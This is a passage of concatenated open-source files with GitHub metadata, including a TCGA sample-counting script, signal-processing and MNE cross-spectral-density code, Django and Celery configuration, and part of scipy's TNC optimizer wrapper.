        # one is already buffered, otherwise when it arrives.
        pending = defer.Deferred()
        if not self.queue:
            self.listeners.append(pending)
        else:
            pending.callback(self.queue.pop(0))
        return pending

    def stanzaSend(self, stanza):
        self.component.send(stanza)
|
{
"content_hash": "a310654ab6441982cb1dbc5b0ca24169",
"timestamp": "",
"source": "github",
"line_count": 88,
"max_line_length": 79,
"avg_line_length": 29.772727272727273,
"alnum_prop": 0.5946564885496183,
"repo_name": "ojab/bnw",
"id": "654195351a9db65e409c1ded9b130bd6ffd1a0b6",
"size": "2620",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bnw/tests/test_server/xmpp_tester.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "9310"
},
{
"name": "HTML",
"bytes": "29045"
},
{
"name": "JavaScript",
"bytes": "52028"
},
{
"name": "Python",
"bytes": "238111"
},
{
"name": "Shell",
"bytes": "2934"
}
],
"symlink_target": ""
}
|
'''
Created on Jun 14, 2013
class to iterate through the TCGA directories and report on counts per cancer per platform
@author: michael
'''
from datetime import datetime
import sys
import parse_tcga
from technology_type_factory import technology_type_factory
# Column headers for per-sample and per-participant count tables.
# NOTE(review): neither list is referenced in this module's visible code —
# presumably consumed by callers of run(); verify before removing.
sampleheader = ['cnv', 'rna', 'meth', 'mirna', 'total']
participantheader = ['clinical', 'cnv', 'mutations', 'rna', 'meth', 'mirna', 'total']

# Maps a TCGA archive path prefix (center/platform/data-type/) to the
# data-type header its barcodes are counted under in run().
platform2header = {'bcgsc.ca/illuminaga_rnaseq/rnaseq/': 'rna',
                   'bcgsc.ca/illuminaga_mirnaseq/mirnaseq/': 'mirna',
                   'bcgsc.ca/illuminahiseq_rnaseq/rnaseq/': 'rna',
                   'bcgsc.ca/illuminahiseq_mirnaseq/mirnaseq/': 'mirna',
                   'broad.mit.edu/genome_wide_snp_6/snp/': 'cnv',
                   'genome.wustl.edu/genome_wide_snp_6/snp/': 'cnv',
                   'broad.mit.edu/ht_hg-u133a/transcriptome/': 'rna',
                   'jhu-usc.edu/humanmethylation27/methylation/': 'meth',
                   'jhu-usc.edu/humanmethylation450/methylation/': 'meth',
                   'mdanderson.org/mda_rppa_core/protein_exp/': 'protein',
                   'nationwidechildrens.org/microsat_i/fragment_analysis/': 'microsat',
                   'unc.edu/agilentg4502a_07_1/transcriptome/': 'rna',
                   'unc.edu/agilentg4502a_07_2/transcriptome/': 'rna',
                   'unc.edu/agilentg4502a_07_3/transcriptome/': 'rna',
                   'unc.edu/illuminaga_rnaseq/rnaseq/': 'rna',
                   'unc.edu/illuminahiseq_rnaseq/rnaseq/': 'rna',
                   'unc.edu/illuminahiseq_rnaseqv2/rnaseqv2/': 'rna',
                   'unc.edu/h-mirna_8x15k/mirna/': 'mirna',
                   'clinical/': 'clinical'}
def addone(platform2count, header):
    """Increment (in place) the count stored under ``header``, starting at zero."""
    platform2count[header] = platform2count.get(header, 0) + 1
def run(argv):
    # Walks every configured tumour type x platform, collects the sample
    # barcodes found, and returns per-platform / per-patient / per-sample
    # count tables keyed by the headers in platform2header.
    # (Python 2 module: print statements, iteritems/itervalues.)
    print datetime.now(), "starting... (%s)" % (argv)
    _, tumorTypes, _ = parse_tcga.initialize(argv)
    config = parse_tcga.config
    # 'all' expands to every cancer directory listed in the config.
    if ['all'] == tumorTypes:
        tumorTypes = config.get('main', 'cancerDirNames').split(',')
    techTypeFactory = technology_type_factory(config)
    platforms = techTypeFactory.getTechnologyTypes()
    tumor2platforms2barcodes = {}
    for tumor in tumorTypes:
        platforms2barcodes = tumor2platforms2barcodes.setdefault(tumor, {})
        for platform in platforms:
            techType = techTypeFactory.getTechnologyType(config, platform)
            numSamples, filename2sampleInfo, _, _ = parse_tcga.parseFileInfo(techType, tumor)
            if 0 == numSamples:
                print 'did not find any samples for %s' % tumor
                continue
            # info[0][0] is taken to be the barcode — presumably the first
            # field of the first sample tuple; verify against parseFileInfo.
            platforms2barcodes[platform] = set([info[0][0] for info in filename2sampleInfo.itervalues()])
    # put together the return values
    platform2tumors = {}
    tumor2patient2header2counts = {}
    tumor2sample2header2counts = {}
    for tumor, platforms2barcodes in tumor2platforms2barcodes.iteritems():
        for platform, barcodes in platforms2barcodes.iteritems():
            platform2tumors.setdefault(platform, set()).add(tumor)
            header = platform2header[platform]
            if not header:
                raise ValueError('%s was not mapped to a header' % (platform))
            # Barcode prefixes: [:12] identifies the patient, [:16] the
            # sample (only counted when the barcode is long enough).
            [addone(tumor2patient2header2counts.setdefault(tumor, {}).setdefault(barcode[:12], {}), header) for barcode in barcodes]
            [addone(tumor2sample2header2counts.setdefault(tumor, {}).setdefault(barcode[:16], {}), header) for barcode in barcodes if 15 < len(barcode)]
    print '%s' % '\n'.join([(platform + ': ' + str(tumors)) for (platform, tumors) in platform2tumors.iteritems()])
    print datetime.now(), "finished"
    return platform2tumors, tumor2patient2header2counts, tumor2sample2header2counts
# Command-line entry point: forwards argv to run() and exits cleanly.
if __name__ == '__main__':
    run(sys.argv)
    sys.exit(0)
|
{
"content_hash": "e2ab0d899d8018f489b25c2a8a662b6c",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 152,
"avg_line_length": 45.61038961038961,
"alnum_prop": 0.6862186788154897,
"repo_name": "cancerregulome/gidget",
"id": "2c19f64b484b53cd6bb46c81322f050306116904",
"size": "3512",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "commands/feature_matrix_construction/main/count_tcga.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "83724"
},
{
"name": "Python",
"bytes": "2253496"
},
{
"name": "Shell",
"bytes": "457404"
}
],
"symlink_target": ""
}
|
"""Mean time error."""
import numpy as np
from scipy.spatial.distance import cdist
from ruptures.metrics.sanity_check import sanity_check
def meantime(true_bkps, my_bkps):
    """For each computed changepoint, the mean time error is the average number
    of points to the closest true changepoint. Not a symmetric function.

    Args:
        true_bkps (list): list of the last index of each regime (true
            partition).
        my_bkps (list): list of the last index of each regime (computed
            partition)

    Returns:
        float: mean time error.
    """
    sanity_check(true_bkps, my_bkps)
    # Drop the trailing index (the number of samples, common to both
    # partitions) and shape as column vectors for cdist.
    true_arr = np.array(true_bkps[:-1]).reshape(-1, 1)
    pred_arr = np.array(my_bkps[:-1]).reshape(-1, 1)
    # Distance from each computed breakpoint to its nearest true breakpoint.
    nearest = cdist(true_arr, pred_arr).min(axis=0)
    assert len(nearest) == len(my_bkps) - 1
    return nearest.mean()
|
{
"content_hash": "ace9621268211664287f3ef896fcbc90",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 79,
"avg_line_length": 31.310344827586206,
"alnum_prop": 0.6530837004405287,
"repo_name": "deepcharles/ruptures",
"id": "9bbd44931ad964bb839a72f46dc21be66f6d941e",
"size": "908",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/ruptures/metrics/timeerror.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "11503"
},
{
"name": "Cython",
"bytes": "5301"
},
{
"name": "Python",
"bytes": "109410"
}
],
"symlink_target": ""
}
|
import warnings
import copy as cp
import numpy as np
from scipy.fftpack import fftfreq
from ..io.pick import pick_types
from ..utils import logger, verbose
from ..time_frequency.multitaper import (dpss_windows, _mt_spectra,
_csd_from_mt, _psd_from_mt_adaptive)
class CrossSpectralDensity(object):
    """Cross-spectral density

    Parameters
    ----------
    data : array of shape (n_channels, n_channels)
        The cross-spectral density matrix.
    ch_names : list of string
        List of channels' names.
    projs :
        List of projectors used in CSD calculation.
    bads :
        List of bad channels.
    frequencies : float | list of float
        Frequency or frequencies for which the CSD matrix was calculated. If a
        list is passed, data is a sum across CSD matrices for all frequencies.
    n_fft : int
        Length of the FFT used when calculating the CSD matrix.
    """
    def __init__(self, data, ch_names, projs, bads, frequencies, n_fft):
        self.data = data
        self.dim = len(data)
        # Deep-copy the mutable inputs so later changes by the caller cannot
        # silently mutate this object.
        self.ch_names = cp.deepcopy(ch_names)
        self.projs = cp.deepcopy(projs)
        self.bads = cp.deepcopy(bads)
        # Always store frequencies as a 1d array, even for a scalar input.
        self.frequencies = np.atleast_1d(np.copy(frequencies))
        self.n_fft = n_fft

    def __repr__(self):
        # Same text as the historical concatenation-based implementation.
        pieces = ['frequencies : %s' % self.frequencies,
                  'size : %s x %s' % self.data.shape,
                  'data : %s' % self.data]
        return '<CrossSpectralDensity | %s>' % ', '.join(pieces)
@verbose
def compute_epochs_csd(epochs, mode='multitaper', fmin=0, fmax=np.inf,
                       fsum=True, tmin=None, tmax=None, n_fft=None,
                       mt_bandwidth=None, mt_adaptive=False, mt_low_bias=True,
                       projs=None, verbose=None):
    """Estimate cross-spectral density from epochs

    Note: Baseline correction should be used when creating the Epochs.
    Otherwise the computed cross-spectral density will be inaccurate.

    Note: Results are scaled by sampling frequency for compatibility with
    Matlab.

    Parameters
    ----------
    epochs : instance of Epochs
        The epochs.
    mode : str
        Spectrum estimation mode can be either: 'multitaper' or 'fourier'.
    fmin : float
        Minimum frequency of interest.
    fmax : float | np.inf
        Maximum frequency of interest.
    fsum : bool
        Sum CSD values for the frequencies of interest. Summing is performed
        instead of averaging so that accumulated power is comparable to power
        in the time domain. If True, a single CSD matrix will be returned. If
        False, the output will be a list of CSD matrices.
    tmin : float | None
        Minimum time instant to consider. If None start at first sample.
    tmax : float | None
        Maximum time instant to consider. If None end at last sample.
    n_fft : int | None
        Length of the FFT. If None the exact number of samples between tmin and
        tmax will be used.
    mt_bandwidth : float | None
        The bandwidth of the multitaper windowing function in Hz.
        Only used in 'multitaper' mode.
    mt_adaptive : bool
        Use adaptive weights to combine the tapered spectra into PSD.
        Only used in 'multitaper' mode.
    mt_low_bias : bool
        Only use tapers with more than 90% spectral concentration within
        bandwidth. Only used in 'multitaper' mode.
    projs : list of Projection | None
        List of projectors to use in CSD calculation, or None to indicate that
        the projectors from the epochs should be inherited.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    csd : instance of CrossSpectralDensity
        The computed cross-spectral density.
    """
    # Portions of this code adapted from mne/connectivity/spectral.py

    # Check correctness of input data and parameters
    if fmax < fmin:
        raise ValueError('fmax must be larger than fmin')
    tstep = epochs.times[1] - epochs.times[0]
    # Allow tmin/tmax to fall up to one sample step outside the data range.
    if tmin is not None and tmin < epochs.times[0] - tstep:
        raise ValueError('tmin should be larger than the smallest data time '
                         'point')
    if tmax is not None and tmax > epochs.times[-1] + tstep:
        raise ValueError('tmax should be smaller than the largest data time '
                         'point')
    if tmax is not None and tmin is not None:
        if tmax < tmin:
            raise ValueError('tmax must be larger than tmin')
    if epochs.baseline is None:
        warnings.warn('Epochs are not baseline corrected, cross-spectral '
                      'density may be inaccurate')

    if projs is None:
        projs = cp.deepcopy(epochs.info['projs'])
    else:
        projs = cp.deepcopy(projs)

    picks_meeg = pick_types(epochs[0].info, meg=True, eeg=True, eog=False,
                            ref_meg=False, exclude='bads')
    ch_names = [epochs.ch_names[k] for k in picks_meeg]

    # Preparing time window slice
    tstart, tend = None, None
    if tmin is not None:
        tstart = np.where(epochs.times >= tmin)[0][0]
    if tmax is not None:
        tend = np.where(epochs.times <= tmax)[0][-1] + 1
    tslice = slice(tstart, tend, None)
    n_times = len(epochs.times[tslice])
    n_fft = n_times if n_fft is None else n_fft

    # Preparing frequencies of interest
    sfreq = epochs.info['sfreq']
    orig_frequencies = fftfreq(n_fft, 1. / sfreq)
    # NOTE: strict inequalities — fmin and fmax themselves are excluded.
    freq_mask = (orig_frequencies > fmin) & (orig_frequencies < fmax)
    frequencies = orig_frequencies[freq_mask]
    n_freqs = len(frequencies)

    if n_freqs == 0:
        raise ValueError('No discrete fourier transform results within '
                         'the given frequency window. Please widen either '
                         'the frequency window or the time window')

    # Preparing for computing CSD
    logger.info('Computing cross-spectral density from epochs...')
    if mode == 'multitaper':
        # Compute standardized half-bandwidth
        if mt_bandwidth is not None:
            half_nbw = float(mt_bandwidth) * n_times / (2 * sfreq)
        else:
            half_nbw = 2

        # Compute DPSS windows
        n_tapers_max = int(2 * half_nbw)
        window_fun, eigvals = dpss_windows(n_times, half_nbw, n_tapers_max,
                                           low_bias=mt_low_bias)
        n_tapers = len(eigvals)
        logger.info('    using multitaper spectrum estimation with %d DPSS '
                    'windows' % n_tapers)

        if mt_adaptive and len(eigvals) < 3:
            warnings.warn('Not adaptively combining the spectral estimators '
                          'due to a low number of tapers.')
            mt_adaptive = False
    elif mode == 'fourier':
        logger.info('    using FFT with a Hanning window to estimate spectra')
        window_fun = np.hanning(n_times)
        mt_adaptive = False
        eigvals = 1.
        n_tapers = None
    else:
        raise ValueError('Mode has an invalid value.')

    csds_mean = np.zeros((len(ch_names), len(ch_names), n_freqs),
                         dtype=complex)

    # Picking frequencies of interest: _mt_spectra only returns the
    # non-negative half of the spectrum, so restrict the mask accordingly.
    freq_mask_mt = freq_mask[orig_frequencies >= 0]

    # Compute CSD for each epoch
    n_epochs = 0
    for epoch in epochs:
        epoch = epoch[picks_meeg][:, tslice]

        # Calculating Fourier transform using multitaper module
        x_mt, _ = _mt_spectra(epoch, window_fun, sfreq, n_fft)

        if mt_adaptive:
            # Compute adaptive weights
            _, weights = _psd_from_mt_adaptive(x_mt, eigvals, freq_mask,
                                               return_weights=True)
            # Tiling weights so that we can easily use _csd_from_mt()
            weights = weights[:, np.newaxis, :, :]
            weights = np.tile(weights, [1, x_mt.shape[0], 1, 1])
        else:
            # Do not use adaptive weights
            if mode == 'multitaper':
                weights = np.sqrt(eigvals)[np.newaxis, np.newaxis, :,
                                           np.newaxis]
            else:
                # Hack so we can sum over axis=-2
                weights = np.array([1.])[:, None, None, None]

        x_mt = x_mt[:, :, freq_mask_mt]

        # Calculating CSD
        # Tiling x_mt so that we can easily use _csd_from_mt()
        x_mt = x_mt[:, np.newaxis, :, :]
        x_mt = np.tile(x_mt, [1, x_mt.shape[0], 1, 1])
        # Transposed copies give every (channel_i, channel_j) pairing.
        y_mt = np.transpose(x_mt, axes=[1, 0, 2, 3])
        weights_y = np.transpose(weights, axes=[1, 0, 2, 3])
        csds_epoch = _csd_from_mt(x_mt, y_mt, weights, weights_y)

        # Scaling by number of samples and compensating for loss of power due
        # to windowing (see section 11.5.2 in Bendat & Piersol).
        if mode == 'fourier':
            csds_epoch /= n_times
            csds_epoch *= 8 / 3.

        # Scaling by sampling frequency for compatibility with Matlab
        csds_epoch /= sfreq

        csds_mean += csds_epoch
        n_epochs += 1

    csds_mean /= n_epochs

    logger.info('[done]')

    # Summing over frequencies of interest or returning a list of separate CSD
    # matrices for each frequency
    if fsum is True:
        csd_mean_fsum = np.sum(csds_mean, 2)
        csd = CrossSpectralDensity(csd_mean_fsum, ch_names, projs,
                                   epochs.info['bads'],
                                   frequencies=frequencies, n_fft=n_fft)
        return csd
    else:
        csds = []
        for i in range(n_freqs):
            csds.append(CrossSpectralDensity(csds_mean[:, :, i], ch_names,
                                             projs, epochs.info['bads'],
                                             frequencies=frequencies[i],
                                             n_fft=n_fft))
        return csds
|
{
"content_hash": "fd39f69b067a07bc2071886d990e24c7",
"timestamp": "",
"source": "github",
"line_count": 254,
"max_line_length": 79,
"avg_line_length": 38.838582677165356,
"alnum_prop": 0.5854029396857577,
"repo_name": "dimkal/mne-python",
"id": "e147da2858248eb5dd6d0e1995fbd00c9a1e4332",
"size": "9936",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "mne/time_frequency/csd.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "3117"
},
{
"name": "PowerShell",
"bytes": "2988"
},
{
"name": "Python",
"bytes": "4242577"
},
{
"name": "Shell",
"bytes": "936"
}
],
"symlink_target": ""
}
|
from .engine import (
Engine,
)
|
{
"content_hash": "f0e71f4d999c04d933634b637f5277ee",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 21,
"avg_line_length": 12,
"alnum_prop": 0.6111111111111112,
"repo_name": "rsk-mind/rsk-mind-framework",
"id": "e8861b4603cf4f09b84091609a92a56d7e3a6930",
"size": "36",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rsk_mind/engine/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "83888"
}
],
"symlink_target": ""
}
|
from setuptools import setup
# Distribution metadata for the ``confit`` package; consumed by setuptools
# when building or installing (e.g. ``pip install .``).
setup(name = 'confit',
      version = '0.0.0',
      install_requires = [],
      description = 'An object-oriented DSL for system automation',
      maintainer = 'Jason Dusek',
      maintainer_email = 'jason.dusek@gmail.com',
      url = 'https://github.com/solidsnack/confit',
      packages = ['confit'],
      classifiers = ['Environment :: Console',
                     'Intended Audience :: Developers',
                     'Operating System :: Unix',
                     'Operating System :: POSIX',
                     'Programming Language :: Python',
                     'Topic :: System',
                     'Topic :: System :: Systems Administration',
                     'Topic :: Software Development',
                     'Development Status :: 4 - Beta'])
|
{
"content_hash": "e9be574566f6b59f2a0b966034c864f5",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 72,
"avg_line_length": 45.6,
"alnum_prop": 0.46271929824561403,
"repo_name": "solidsnack/confit",
"id": "dc5077ff7ce240117ffd1846d4c45a845b15bac2",
"size": "935",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "169"
},
{
"name": "Python",
"bytes": "20949"
}
],
"symlink_target": ""
}
|
import factory
from django.contrib.gis import geos
class PointFactory(factory.django.DjangoModelFactory):
    """Factory producing ``points.Point`` model instances for tests."""
    # Unique title per generated instance: point-0, point-1, ...
    title = factory.Sequence(lambda n: 'point-{}'.format(n))
    description = 'description'
    # NOTE(review): this geometry is built once at class-definition time and
    # shared by every generated instance — confirm that is acceptable for
    # tests that mutate geom.
    geom = geos.fromstr('POINT (0 0)')

    class Meta:
        model = 'points.Point'
|
{
"content_hash": "342f723ddd8fdc083fbb5a6ab6022b77",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 60,
"avg_line_length": 26.181818181818183,
"alnum_prop": 0.6909722222222222,
"repo_name": "KlubJagiellonski/poznaj-app-backend",
"id": "1712a8375844d70fc87ee3f9a34ba7caba78444e",
"size": "288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "poznaj/points/tests/factories.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1597"
},
{
"name": "Dockerfile",
"bytes": "533"
},
{
"name": "HTML",
"bytes": "1064"
},
{
"name": "Makefile",
"bytes": "1020"
},
{
"name": "Python",
"bytes": "41829"
},
{
"name": "Shell",
"bytes": "684"
}
],
"symlink_target": ""
}
|
from django.contrib import admin
from .models import Person, SantaList
# Person needs no custom admin options; register with the default ModelAdmin.
admin.site.register(Person)
class SantaListAdmin(admin.ModelAdmin):
    """Admin configuration for SantaList: sorted by name, hashes read-only."""
    list_display = ['name', 'organiser_email']
    ordering = ['name']
    # NOTE(review): slug and the secure hashes are shown but not editable —
    # presumably generated automatically by the model; verify before changing.
    readonly_fields = ['slug', 'secure_hash_signup', 'secure_hash_review']

admin.site.register(SantaList, SantaListAdmin)
|
{
"content_hash": "66b479929f6e720772d7dabe0df4f820",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 74,
"avg_line_length": 21.25,
"alnum_prop": 0.7264705882352941,
"repo_name": "TheUKDave/secret_santa",
"id": "a4d1de56f06862f62fdff579682e4d3fe5dd09c3",
"size": "340",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "santa/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "403"
},
{
"name": "HTML",
"bytes": "4726"
},
{
"name": "JavaScript",
"bytes": "484"
},
{
"name": "Python",
"bytes": "25618"
},
{
"name": "Shell",
"bytes": "1243"
}
],
"symlink_target": ""
}
|
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
# This must happen before the Celery app is created so the Django-derived
# configuration below can resolve.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "webquills.settings")

# Module-level Celery application; workers are started against this object.
app = Celery("webquills")

# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
#   should have a `CELERY_` prefix.
app.config_from_object("django.conf:settings", namespace="CELERY")

# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
|
{
"content_hash": "014ca5e5a01e12b8520318daea866d20",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 69,
"avg_line_length": 33.588235294117645,
"alnum_prop": 0.7723292469352014,
"repo_name": "veselosky/webquills",
"id": "e602b3539d98452801295994c847b46e7b3ccaf6",
"size": "571",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "webquills/celery.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "21709"
},
{
"name": "HTML",
"bytes": "12296"
},
{
"name": "Python",
"bytes": "135964"
},
{
"name": "Shell",
"bytes": "3242"
}
],
"symlink_target": ""
}
|
"""
TNC: A python interface to the TNC non-linear optimizer
TNC is a non-linear optimizer. To use it, you must provide a function to
minimize. The function must take one argument: the list of coordinates where to
evaluate the function; and it must return either a tuple, whose first element is the
value of the function, and whose second argument is the gradient of the function
(as a list of values); or None, to abort the minimization.
"""
from __future__ import division, print_function, absolute_import
from scipy.optimize import moduleTNC, approx_fprime
from .optimize import MemoizeJac, Result, _check_unknown_options
from numpy import asarray, inf, array
__all__ = ['fmin_tnc']
# Verbosity bit flags for the underlying C TNC solver; they may be OR-ed /
# summed together (MSG_ALL is the sum of the individual flags).
MSG_NONE = 0 # No messages
MSG_ITER = 1 # One line per iteration
MSG_INFO = 2 # Informational messages
MSG_VERS = 4 # Version info
MSG_EXIT = 8 # Exit reasons
MSG_ALL = MSG_ITER + MSG_INFO + MSG_VERS + MSG_EXIT
# Human-readable description of each verbosity level.
MSGS = {
        MSG_NONE : "No messages",
        MSG_ITER : "One line per iteration",
        MSG_INFO : "Informational messages",
        MSG_VERS : "Version info",
        MSG_EXIT : "Exit reasons",
        MSG_ALL : "All messages"
}
# Return codes produced by the C solver (`rc` in the results).
INFEASIBLE = -1 # Infeasible (low > up)
LOCALMINIMUM = 0 # Local minima reach (|pg| ~= 0)
FCONVERGED = 1 # Converged (|f_n-f_(n-1)| ~= 0)
XCONVERGED = 2 # Converged (|x_n-x_(n-1)| ~= 0)
MAXFUN = 3 # Max. number of function evaluations reach
LSFAIL = 4 # Linear search failed
CONSTANT = 5 # All lower bounds are equal to the upper bounds
NOPROGRESS = 6 # Unable to progress
USERABORT = 7 # User requested end of minimization
# Human-readable message for each return code.
RCSTRINGS = {
        INFEASIBLE : "Infeasible (low > up)",
        LOCALMINIMUM : "Local minima reach (|pg| ~= 0)",
        FCONVERGED : "Converged (|f_n-f_(n-1)| ~= 0)",
        XCONVERGED : "Converged (|x_n-x_(n-1)| ~= 0)",
        MAXFUN : "Max. number of function evaluations reach",
        LSFAIL : "Linear search failed",
        CONSTANT : "All lower bounds are equal to the upper bounds",
        NOPROGRESS : "Unable to progress",
        USERABORT : "User requested end of minimization"
}
# Changes to interface made by Travis Oliphant, Apr. 2004 for inclusion in
# SciPy
def fmin_tnc(func, x0, fprime=None, args=(), approx_grad=0,
             bounds=None, epsilon=1e-8, scale=None, offset=None,
             messages=MSG_ALL, maxCGit=-1, maxfun=None, eta=-1,
             stepmx=0, accuracy=0, fmin=0, ftol=-1, xtol=-1, pgtol=-1,
             rescale=-1, disp=None, callback=None):
    """
    Minimize a function with variables subject to bounds, using
    gradient information in a truncated Newton algorithm. This
    method wraps a C implementation of the algorithm.
    Parameters
    ----------
    func : callable ``func(x, *args)``
        Function to minimize.  Must do one of:
        1. Return f and g, where f is the value of the function and g its
           gradient (a list of floats).
        2. Return the function value but supply gradient function
           separately as `fprime`.
        3. Return the function value and set ``approx_grad=True``.
        If the function returns None, the minimization
        is aborted.
    x0 : list of floats
        Initial estimate of minimum.
    fprime : callable ``fprime(x, *args)``
        Gradient of `func`. If None, then either `func` must return the
        function value and the gradient (``f,g = func(x, *args)``)
        or `approx_grad` must be True.
    args : tuple
        Arguments to pass to function.
    approx_grad : bool
        If true, approximate the gradient numerically.
    bounds : list
        (min, max) pairs for each element in x0, defining the
        bounds on that parameter. Use None or +/-inf for one of
        min or max when there is no bound in that direction.
    epsilon : float
        Used if approx_grad is True. The stepsize in a finite
        difference approximation for fprime.
    scale : list of floats
        Scaling factors to apply to each variable. If None, the
        factors are up-low for interval bounded variables and
        1+|x| for the others. Defaults to None.
    offset : float
        Value to subtract from each variable. If None, the
        offsets are (up+low)/2 for interval bounded variables
        and x for the others.
    messages :
        Bit mask used to select messages display during
        minimization values defined in the MSGS dict. Defaults to
        MSG_ALL.
    disp : int
        Integer interface to messages. 0 = no message, 5 = all messages
    maxCGit : int
        Maximum number of hessian*vector evaluations per main
        iteration. If maxCGit == 0, the direction chosen is
        -gradient if maxCGit < 0, maxCGit is set to
        max(1,min(50,n/2)). Defaults to -1.
    maxfun : int
        Maximum number of function evaluations. if None, maxfun is
        set to max(100, 10*len(x0)). Defaults to None.
    eta : float
        Severity of the line search. if < 0 or > 1, set to 0.25.
        Defaults to -1.
    stepmx : float
        Maximum step for the line search. May be increased during
        call. If too small, it will be set to 10.0. Defaults to 0.
    accuracy : float
        Relative precision for finite difference calculations. If
        <= machine_precision, set to sqrt(machine_precision).
        Defaults to 0.
    fmin : float
        Minimum function value estimate. Defaults to 0.
    ftol : float
        Precision goal for the value of f in the stopping criterion.
        If ftol < 0.0, ftol is set to 0.0 defaults to -1.
    xtol : float
        Precision goal for the value of x in the stopping
        criterion (after applying x scaling factors). If xtol <
        0.0, xtol is set to sqrt(machine_precision). Defaults to
        -1.
    pgtol : float
        Precision goal for the value of the projected gradient in
        the stopping criterion (after applying x scaling factors).
        If pgtol < 0.0, pgtol is set to 1e-2 * sqrt(accuracy).
        Setting it to 0.0 is not recommended. Defaults to -1.
    rescale : float
        Scaling factor (in log10) used to trigger f value
        rescaling. If 0, rescale at each iteration. If a large
        value, never rescale. If < 0, rescale is set to 1.3.
    callback : callable, optional
        Called after each iteration, as callback(xk), where xk is the
        current parameter vector.
    Returns
    -------
    x : list of floats
        The solution.
    nfeval : int
        The number of function evaluations.
    rc : int
        Return code as defined in the RCSTRINGS dict.
    See also
    --------
    minimize: Interface to minimization algorithms for multivariate
        functions. See the 'TNC' `method` in particular.
    Notes
    -----
    The underlying algorithm is truncated Newton, also called
    Newton Conjugate-Gradient. This method differs from
    scipy.optimize.fmin_ncg in that
    1. It wraps a C implementation of the algorithm
    2. It allows each variable to be given an upper and lower bound.
    The algorithm incorporates the bound constraints by determining
    the descent direction as in an unconstrained truncated Newton,
    but never taking a step-size large enough to leave the space
    of feasible x's. The algorithm keeps track of a set of
    currently active constraints, and ignores them when computing
    the minimum allowable step size. (The x's associated with the
    active constraint are kept fixed.) If the maximum allowable
    step size is zero then a new constraint is added. At the end
    of each iteration one of the constraints may be deemed no
    longer active and removed. A constraint is considered
    no longer active if it is currently active
    but the gradient for that variable points inward from the
    constraint. The specific constraint removed is the one
    associated with the variable of largest index whose
    constraint is no longer active.
    References
    ----------
    Wright S., Nocedal J. (2006), 'Numerical Optimization'
    Nash S.G. (1984), "Newton-Type Minimization Via the Lanczos Method",
    SIAM Journal of Numerical Analysis 21, pp. 770-778
    """
    # handle fprime/approx_grad: reduce the three calling conventions to a
    # (fun, jac) pair for _minimize_tnc
    if approx_grad:
        # gradient will be approximated by finite differences downstream
        fun = func
        jac = None
    elif fprime is None:
        # func returns (f, g): memoize so f and g are separately callable
        fun = MemoizeJac(func)
        jac = fun.derivative
    else:
        fun = func
        jac = fprime
    if disp is not None: # disp takes precedence over messages
        mesg_num = disp
    else:
        # translate the MSG_* bit mask into the 0-5 integer scale
        mesg_num = {0:MSG_NONE, 1:MSG_ITER, 2:MSG_INFO, 3:MSG_VERS,
                    4:MSG_EXIT, 5:MSG_ALL}.get(messages, MSG_ALL)
    # build options with the names _minimize_tnc expects
    opts = {'eps' : epsilon,
            'scale': scale,
            'offset': offset,
            'mesg_num': mesg_num,
            'maxCGit': maxCGit,
            'maxiter': maxfun,
            'eta': eta,
            'stepmx': stepmx,
            'accuracy': accuracy,
            'minfev': fmin,
            'ftol': ftol,
            'xtol': xtol,
            'gtol': pgtol,
            'rescale': rescale,
            'disp': False}
    # delegate to the shared implementation and unpack its Result into the
    # legacy (x, nfeval, rc) tuple
    res = _minimize_tnc(fun, x0, args, jac, bounds, callback=callback, **opts)
    return res['x'], res['nfev'], res['status']
def _minimize_tnc(fun, x0, args=(), jac=None, bounds=None,
                  eps=1e-8, scale=None, offset=None, mesg_num=None,
                  maxCGit=-1, maxiter=None, eta=-1, stepmx=0, accuracy=0,
                  minfev=0, ftol=-1, xtol=-1, gtol=-1, rescale=-1, disp=False,
                  callback=None, **unknown_options):
    """
    Minimize a scalar function of one or more variables using a truncated
    Newton (TNC) algorithm.
    Options for the TNC algorithm are:
        eps : float
            Step size used for numerical approximation of the jacobian.
        scale : list of floats
            Scaling factors to apply to each variable. If None, the
            factors are up-low for interval bounded variables and
            1+|x| for the others. Defaults to None.
        offset : float
            Value to subtract from each variable. If None, the
            offsets are (up+low)/2 for interval bounded variables
            and x for the others.
        disp : bool
            Set to True to print convergence messages.
        maxCGit : int
            Maximum number of hessian*vector evaluations per main
            iteration. If maxCGit == 0, the direction chosen is
            -gradient if maxCGit < 0, maxCGit is set to
            max(1,min(50,n/2)). Defaults to -1.
        maxiter : int
            Maximum number of function evaluations. if None, `maxiter` is
